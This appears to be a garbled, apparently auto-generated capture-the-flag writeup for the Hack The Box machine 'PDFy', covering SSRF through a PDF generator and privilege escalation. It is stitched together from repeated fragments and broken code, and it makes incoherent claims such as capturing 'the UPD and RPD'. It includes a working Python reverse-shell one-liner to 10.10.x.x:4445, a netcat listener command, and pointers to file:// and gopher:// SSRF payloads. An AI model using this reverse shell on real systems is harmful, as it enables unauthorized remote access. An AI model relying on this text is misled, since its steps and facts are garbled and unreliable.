Pdfy Htb Writeup Upd |best| -

If you are attempting this box, focus on the ( file:// , gopher:// ) and the metadata of the files you are asking the server to process. The flag is usually found in /root/root.txt or a similar standard location after escalating privileges via a misconfigured script or binary.

Check sudo rights:

ls -la /home/

The vulnerability map follows a classic vector where an application trusts user input to make outbound HTTP requests:

The box highlights why developers must sanitize URL inputs. pdfy htb writeup upd

fetch("/api/cache", method: "POST", body: JSON.stringify( url: url.value ), headers: "Content-Type": "application/json" ) Use code with caution.

⚙️ Phase 2: Vulnerability Identification (SSRF & Code Execution) If you are attempting this box, focus on

: We inject our payload into the vulnerable input field and submit it to the application. When the backend processes our input, it triggers the reverse shell, granting us a shell on the target system as the web application user. 🚩 Phase 4: Post-Exploitation and Flag Capture

By using the PDF generator to read files via file:// and then exploiting pdftex for root, you can successfully root PDFY and capture both the UPD and RPD. fetch("/api/cache", method: "POST", body: JSON

"endpoint": "/download", "methods": ["GET"]

import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.x.x",4445)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); Use code with caution. Set up a new listener: nc -lvnp 4445 Wait for the cron job to execute, giving us a root shell. 6. Conclusion and Key Takeaways